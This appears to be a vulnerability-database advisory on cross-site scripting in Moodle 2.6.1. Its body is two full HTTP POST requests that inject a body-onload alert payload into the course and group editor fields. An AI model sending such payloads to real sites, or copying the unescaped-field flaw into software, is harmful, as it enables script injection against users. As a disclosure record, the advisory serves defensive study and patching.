Moodle 2.6.1 Cross Site Scripting

2014.02.28
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| Moodle 2.6.1 # Version .| (Feb 27 2014) moodle-latest-26.zip # Date ....| 27.02.2014 # Found ...| HauntIT Blog # Home ....| http://download.moodle.org # ============================================================== [+] From admin user: # ============================================================== # 1. Persistent XSS ---<request>--- POST /k/cms/moodle/course/edit.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 988 returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes ---<request>--- # ============================================================== # 2. XSS ---<request>--- POST /k/cms/moodle/group/group.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 361 id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top